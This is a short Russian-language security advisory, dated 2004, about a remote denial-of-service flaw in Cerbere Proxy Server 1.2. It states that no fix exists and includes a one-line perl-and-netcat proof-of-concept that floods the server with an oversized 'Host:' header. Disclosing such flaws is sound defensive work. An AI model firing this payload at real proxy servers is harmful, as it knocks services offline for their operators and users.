Security Lab

Удаленный отказ в обслуживании в Cerbere Proxy Server

Дата публикации:02.09.2004
Всего просмотров:1258
Опасность:
Низкая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Отказ в обслуживании
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Cerbere Proxy Server 1.x
Уязвимые версии: Cerbere Proxy Server 1.2

Описание: Уязвимость обнаружена в Cerbere Proxy Server. Удаленный пользователь может вызвать условия отказа в обслуживании.

Удаленный пользователь может представить HTTP GET запрос с длинным полем 'Host:' заголовка, чтобы заставить сервер использовать все доступные ресурсы CPU.

Пример/Эксплоит:

perl -e 'print "GET / HTTP/1.1\r\n" . "Host: " . "A" x 90000 . "\r\n" . "\r\n\r\n" ' | nc "Proxy_IP"

URL производителя: http://cerbere.szym.org/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Cerbere Proxy Server ver 1.2